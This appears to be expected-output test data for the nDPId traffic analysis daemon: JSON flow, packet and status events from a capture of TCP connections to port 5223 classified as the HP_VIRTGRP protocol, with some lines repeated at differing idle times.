00650{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":64,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1614877863379,"flow_last_seen":1614877863430,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":132,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1614877863430,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"160.44.194.66","src_port":40152,"dst_port":5223,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HP_VIRTGRP","breed":"Acceptable","category":"Network"}}
00553{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":76,"source":"hpvirtgrp.pcap","alias":"nDPId-test","packets-captured":76,"packets-processed":75,"total-skipped-flows":0,"total-l4-data-len":2866,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":5,"total-detection-updates":0,"total-updates":0,"current-active-flows":2,"total-active-flows":5,"total-idle-flows":3,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":34,"global_ts_msec":1614880256676}
00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":76,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1614880256676,"flow_last_seen":1614880256676,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1614880256676,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"160.44.194.66","src_port":35634,"dst_port":5223,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":76,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1614880256676,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1614880256676,"pkt":"eJS0JASgYDjgxTWgCABFAAA87gNAAD8GKD3AqAJkoCzCQosyFGf2oDFeAAAAAKAC\/\/9JKQAAAgQFtAQCCAoAlBEuAAAAAAEDAwg="}
00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":77,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":2,"flow_last_seen":1614880256703,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1614880256703,"pkt":"YDjgxTWgeJS0JASgCABFAAAsAABAADQGIVGgLMJCwKgCZBRnizKJqg+b9qAxX2ASchCfswAAAgQFrAAA"}
00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":78,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":3,"flow_last_seen":1614880256708,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1614880256708,"pkt":"eJS0JASgYDjgxTWgCABFAAAo7gRAAD8GKFDAqAJkoCzCQosyFGf2oDFfiaoPnFAQ\/\/8peQAA"}
00650{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":79,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1614880256676,"flow_last_seen":1614880256732,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":132,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1614880256732,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"160.44.194.66","src_port":35634,"dst_port":5223,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HP_VIRTGRP","breed":"Acceptable","category":"Network"}}
00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":76,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1614880256676,"flow_last_seen":1614880256676,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1614880256676,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"160.44.194.66","src_port":35634,"dst_port":5223,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":76,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1614880256676,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1614880256676,"pkt":"eJS0JASgYDjgxTWgCABFAAA87gNAAD8GKD3AqAJkoCzCQosyFGf2oDFeAAAAAKAC\/\/9JKQAAAgQFtAQCCAoAlBEuAAAAAAEDAwg="}
00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":77,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":2,"flow_last_seen":1614880256703,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1614880256703,"pkt":"YDjgxTWgeJS0JASgCABFAAAsAABAADQGIVGgLMJCwKgCZBRnizKJqg+b9qAxX2ASchCfswAAAgQFrAAA"}
00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":78,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":3,"flow_last_seen":1614880256708,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1614880256708,"pkt":"eJS0JASgYDjgxTWgCABFAAAo7gRAAD8GKFDAqAJkoCzCQosyFGf2oDFfiaoPnFAQ\/\/8peQAA"}
00650{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":79,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1614880256676,"flow_last_seen":1614880256732,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":132,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1614880256732,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"160.44.194.66","src_port":35634,"dst_port":5223,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HP_VIRTGRP","breed":"Acceptable","category":"Network"}}
00553{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":91,"source":"hpvirtgrp.pcap","alias":"nDPId-test","packets-captured":91,"packets-processed":90,"total-skipped-flows":0,"total-l4-data-len":3481,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":6,"total-detection-updates":0,"total-updates":0,"current-active-flows":3,"total-active-flows":6,"total-idle-flows":3,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":40,"global_ts_msec":1614892184461}
00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":91,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1614892184461,"flow_last_seen":1614892184461,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1614892184461,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"160.44.194.66","src_port":49838,"dst_port":5223,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":91,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":1,"flow_last_seen":1614892184461,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1614892184461,"pkt":"eJS0JASgYDjgxTWgCABFAAA8o7JAAD8Gco7AqAJkoCzCQsKuFGf4RqT8AAAAAKAC\/\/\/8FAAAAgQFtAQCCAoBLLDpAAAAAAEDAwg="}
00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":92,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":2,"flow_last_seen":1614892184487,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1614892184487,"pkt":"eJS0JASgYDjgxTWgCABFAAA8o7NAAD8Gco3AqAJkoCzCQsKuFGf4RqT8AAAAAKAC\/\/\/4LwAAAgQFtAQCCAoBLLTOAAAAAAEDAwg="}
00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":93,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":3,"flow_last_seen":1614892184489,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1614892184489,"pkt":"YDjgxTWgeJS0JASgCABFAAAsAABAADQGIVGgLMJCwKgCZBRnwq4QVsoE+Eak\/WASchCx3QAAAgQFrAAA"}
00650{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":95,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1614892184461,"flow_last_seen":1614892184500,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":132,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1614892184500,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"160.44.194.66","src_port":49838,"dst_port":5223,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HP_VIRTGRP","breed":"Acceptable","category":"Network"}}
00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":104,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1614876808445,"flow_last_seen":1614876926772,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":163,"flow_tot_l4_payload_len":522,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1614892185660,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"160.44.194.66","src_port":59920,"dst_port":5223,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HP_VIRTGRP","breed":"Acceptable","category":"Network"}}
00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":104,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1614880256676,"flow_last_seen":1614880490568,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":163,"flow_tot_l4_payload_len":615,"flow_avg_l4_payload_len":41,"midstream":0,"thread_ts_msec":1614892185660,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"160.44.194.66","src_port":35634,"dst_port":5223,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HP_VIRTGRP","breed":"Acceptable","category":"Network"}}
00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":104,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1614877863379,"flow_last_seen":1614877864559,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":163,"flow_tot_l4_payload_len":778,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1614892185660,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"160.44.194.66","src_port":40152,"dst_port":5223,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HP_VIRTGRP","breed":"Acceptable","category":"Network"}}
00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":91,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1614892184461,"flow_last_seen":1614892184461,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1614892184461,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"160.44.194.66","src_port":49838,"dst_port":5223,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":91,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":1,"flow_last_seen":1614892184461,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1614892184461,"pkt":"eJS0JASgYDjgxTWgCABFAAA8o7JAAD8Gco7AqAJkoCzCQsKuFGf4RqT8AAAAAKAC\/\/\/8FAAAAgQFtAQCCAoBLLDpAAAAAAEDAwg="}
00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":92,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":2,"flow_last_seen":1614892184487,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1614892184487,"pkt":"eJS0JASgYDjgxTWgCABFAAA8o7NAAD8Gco3AqAJkoCzCQsKuFGf4RqT8AAAAAKAC\/\/\/4LwAAAgQFtAQCCAoBLLTOAAAAAAEDAwg="}
00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":93,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":3,"flow_last_seen":1614892184489,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1614892184489,"pkt":"YDjgxTWgeJS0JASgCABFAAAsAABAADQGIVGgLMJCwKgCZBRnwq4QVsoE+Eak\/WASchCx3QAAAgQFrAAA"}
00650{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":95,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1614892184461,"flow_last_seen":1614892184500,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":132,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1614892184500,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"160.44.194.66","src_port":49838,"dst_port":5223,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HP_VIRTGRP","breed":"Acceptable","category":"Network"}}
00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":104,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1614876808445,"flow_last_seen":1614876926772,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":163,"flow_tot_l4_payload_len":522,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1614892185660,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"160.44.194.66","src_port":59920,"dst_port":5223,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HP_VIRTGRP","breed":"Acceptable","category":"Network"}}
00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":104,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1614880256676,"flow_last_seen":1614880490568,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":163,"flow_tot_l4_payload_len":615,"flow_avg_l4_payload_len":41,"midstream":0,"thread_ts_msec":1614892185660,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"160.44.194.66","src_port":35634,"dst_port":5223,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HP_VIRTGRP","breed":"Acceptable","category":"Network"}}
00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":104,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1614877863379,"flow_last_seen":1614877864559,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":163,"flow_tot_l4_payload_len":778,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1614892185660,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"160.44.194.66","src_port":40152,"dst_port":5223,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HP_VIRTGRP","breed":"Acceptable","category":"Network"}}
00556{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":106,"source":"hpvirtgrp.pcap","alias":"nDPId-test","packets-captured":106,"packets-processed":105,"total-skipped-flows":0,"total-l4-data-len":4061,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":7,"total-detection-updates":0,"total-updates":0,"current-active-flows":1,"total-active-flows":7,"total-idle-flows":6,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":49,"global_ts_msec":1614894888601}
00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":106,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1614894888601,"flow_last_seen":1614894888601,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1614894888601,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"160.44.194.66","src_port":42552,"dst_port":5223,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":106,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":1614894888601,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1614894888601,"pkt":"eJS0JASgYDjgxTWgCABFAAA8czZAAD8GowrAqAJkoCzCQqY4FGfLLz4YAAAAAKAC\/\/+U4AAAAgQFtAQCCAoBVchmAAAAAAEDAwg="}
00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":107,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":2,"flow_last_seen":1614894888628,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1614894888628,"pkt":"YDjgxTWgeJS0JASgCABFAAAsAABAADQGIVGgLMJCwKgCZBRnpjjVSzZFyy8+GWASchAxGQAAAgQFrAAA"}
00454{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":108,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":3,"flow_last_seen":1614894888632,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1614894888632,"pkt":"eJS0JASgYDjgxTWgCABFAAAoczdAAD8Gox3AqAJkoCzCQqY4FGfLLz4Z1Us2RlAQ\/\/+63gAA"}
00651{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":109,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1614894888601,"flow_last_seen":1614894888640,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":132,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1614894888640,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"160.44.194.66","src_port":42552,"dst_port":5223,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HP_VIRTGRP","breed":"Acceptable","category":"Network"}}
00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":106,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1614894888601,"flow_last_seen":1614894888601,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1614894888601,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"160.44.194.66","src_port":42552,"dst_port":5223,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":106,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":1614894888601,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1614894888601,"pkt":"eJS0JASgYDjgxTWgCABFAAA8czZAAD8GowrAqAJkoCzCQqY4FGfLLz4YAAAAAKAC\/\/+U4AAAAgQFtAQCCAoBVchmAAAAAAEDAwg="}
00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":107,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":2,"flow_last_seen":1614894888628,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1614894888628,"pkt":"YDjgxTWgeJS0JASgCABFAAAsAABAADQGIVGgLMJCwKgCZBRnpjjVSzZFyy8+GWASchAxGQAAAgQFrAAA"}
00454{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":108,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":3,"flow_last_seen":1614894888632,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1614894888632,"pkt":"eJS0JASgYDjgxTWgCABFAAAoczdAAD8Gox3AqAJkoCzCQqY4FGfLLz4Z1Us2RlAQ\/\/+63gAA"}
00651{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":109,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1614894888601,"flow_last_seen":1614894888640,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":132,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1614894888640,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"160.44.194.66","src_port":42552,"dst_port":5223,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HP_VIRTGRP","breed":"Acceptable","category":"Network"}}
00556{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":121,"source":"hpvirtgrp.pcap","alias":"nDPId-test","packets-captured":121,"packets-processed":120,"total-skipped-flows":0,"total-l4-data-len":4583,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":8,"total-detection-updates":0,"total-updates":0,"current-active-flows":2,"total-active-flows":8,"total-idle-flows":6,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":55,"global_ts_msec":1614898090218}
00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":121,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1614898090218,"flow_last_seen":1614898090218,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1614898090218,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"160.44.194.66","src_port":42764,"dst_port":5223,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":121,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":1,"flow_last_seen":1614898090218,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1614898090218,"pkt":"eJS0JASgYDjgxTWgCABFAAA8EFJAAD8GBe\/AqAJkoCzCQqcMFGeOCpYjAAAAAKAC\/\/+UDgAAAgQFtAQCCAoBYq1xAAAAAAEDAwg="}
00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":122,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":2,"flow_last_seen":1614898090245,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1614898090245,"pkt":"YDjgxTWgeJS0JASgCABFAAAsAABAADQGIVGgLMJCwKgCZBRnpwwosEHQjgqWJGASchC2bwAAAgQFrAAA"}
00454{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":123,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":3,"flow_last_seen":1614898090249,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1614898090249,"pkt":"eJS0JASgYDjgxTWgCABFAAAoEFNAAD8GBgLAqAJkoCzCQqcMFGeOCpYkKLBB0VAQ\/\/9ANQAA"}
00651{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":124,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1614898090218,"flow_last_seen":1614898090270,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":132,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1614898090270,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"160.44.194.66","src_port":42764,"dst_port":5223,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HP_VIRTGRP","breed":"Acceptable","category":"Network"}}
